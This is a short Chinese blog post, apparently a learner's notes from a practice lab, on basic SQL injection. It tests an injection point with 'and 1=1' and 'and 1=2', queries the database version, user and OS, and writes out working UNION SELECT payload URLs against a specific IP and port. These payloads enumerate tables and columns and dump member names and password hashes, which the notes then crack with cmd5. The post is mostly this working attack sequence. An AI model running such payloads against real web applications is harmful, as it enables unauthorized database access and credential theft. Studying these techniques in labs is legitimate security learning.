首页 > 数据库 >今日学习简单sql注入

今日学习简单sql注入

时间:2023-05-22 21:48:31浏览次数:40  
标签:name StormGroup 学习 124.70 sql 45848 id 注入

一般的sql注入思路:
看是否有注入点的方式1. and 1=1 正确;and 1=2 错误(原因:逻辑运算的判断)方式2.随便输入一串字符看是否报错,如果报错或者跳转说明有检测大部分没漏洞。
数据库版本(version()) 5.7.22-0ubuntu0.16.04.1
数据库(database()) mozhe_Discuz_StormGroup
操作系统(@@version_compile_os) Linux
用户(user()) root@localhost
查询大表中http://124.70.22.208:45848/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
表名 StormGroup_member,notice
列名表查询http://124.70.22.208:45848/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
列id,name,password,status
数据查询http://124.70.22.208:45848/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member
获得登录账户和密码使用cmd5解密
多个数据拆解limit x,1 变动拆解

标签:name,StormGroup,学习,124.70,sql,45848,id,注入
From: https://www.cnblogs.com/neinei0412/p/17421805.html

相关文章

  • unity学习日志3(麦扣老师3DRPG项目学习)
    1.ShaderGraphy基本使用利用unity自带的菲利涅效果通过Multiply用Color使其改变颜色,操作如上如所示将需要调整的变量放到左上角中,即可和在inspector中随时调整shaderAlphaClipping:用于透明与非透明之间进行过渡AlphaThreshold代表阈值:没到达这个值不会进行渲染DithCoun......
  • 前端学习 node 快速入门 系列 —— 事件循环
    事件循环本篇将对以下问题进行讨论:浏览器有事件循环,node也有事件循环,两者有什么异同?node核心特性(事件驱动和非阻塞I/O)和事件循环有什么关系?node中的高并发和高性能和事件循环有关系吗?node不适合什么场景?有人说Node是单线程,有人又说node存在多线程,哪个正确?如果一......
  • m基于PCA-SA低纬紧致姿态空间学习算法的单目视频人体姿态提取matlab仿真
    1.算法仿真效果matlab2013b仿真结果如下:2.算法涉及理论知识概要介绍了运动人体的剪影提取,在视频序列中,由于受到复杂背景、遮挡、光照变化等因素的影响,通常的背景分离算法无法有效的对运动人体进行提取,本文介绍了一种基于高斯混合模型和帧差法相结合的运动目标提取算法,从......
  • m基于PCA-SA低纬紧致姿态空间学习算法的单目视频人体姿态提取matlab仿真
    1.算法仿真效果matlab2013b仿真结果如下:              2.算法涉及理论知识概要           介绍了运动人体的剪影提取,在视频序列中,由于受到复杂背景、遮挡、光照变化等因素的影响,通常的背景分离算法无法有效的对运动人体......
  • C#学习笔记 -- 抽象、密封类、静态类、扩展方法
    1、抽象成员指设计被覆写的函数成员,特征如下必须是一个函数成员,字段常量不可用属性、索引器、事件、方法都可用必须用abstracet修饰不能实现,代码、访问器用分号表示abstractpublicvoidPrintStuff(strings);​abstractpulbicintMyProperty{......
  • C#学习笔记 -- 构造器、类的访问修饰符
    构造函数的执行要创建对象的基类部分,需要隐式的调用基类的无参构造函数继承层次链中的每个类在执行他自己的构造函数体之前执行他的基类构造函数对象构造的顺序如下注意禁止在构造函数中调用虚方法在执行基类的构造函数,基类的虚方法会调用派生类的覆写方法,......
  • C#学习笔记 -- 成员访问修饰符
    成员访问修饰符所有显式声明在类声明中的成员都是互相可见的,无论给他们声明访问等级继承的成员不在类声明中显式声明,所以,继承成员对派生类的成员是可见的,也可以是不可见的,基类私有派生类看不见访问级别publicprivateprotectedinternalprotected......
  • R语言学习记录
    2021年买的课程,今天终于开始正式学习了,这个故事告诉我们,学术还是得硕博时期搞,一旦毕业工作了,杂七杂八的事情太多,再加上家庭等因素,就会导致一拖再拖。首先,第一件事,放下焦虑,什么时候我变成了特别想一下子学会某件事情,而不再享受学习过程逐渐习得的快乐了呢?老师说,需要100小时才算是......
  • sqli-lib通关笔记
    因为好久都没有联系过SQL注入了,打算重新拾起渗透方向的能力,去他妈的运维,老子才不要做运维,被傻逼公司给骗了,当了一年的运维,白白浪费了一年。第一关先查看一下代码: 真正的关于注入的核心语句就只有中间的select查询语句,一是先看是什么闭合,第二再看有没有过滤没有任何的......
  • MySQL-Zabbix-5.0监控MySQL
    zabbix官网:https://www.zabbix.com/cn系统版本:CentOS-7.6zabbix版本:5.0LTS1、安装zabbix1.更新yum源#rpm-Uvhhttps://repo.zabbix.com/zabbix/5.0/rhel/7/x86_64/zabbix-release-5.0-1.el7.noarch.rpm#yumcleanall2.安装Zabbixserver,Web前端,agent#yuminstallza......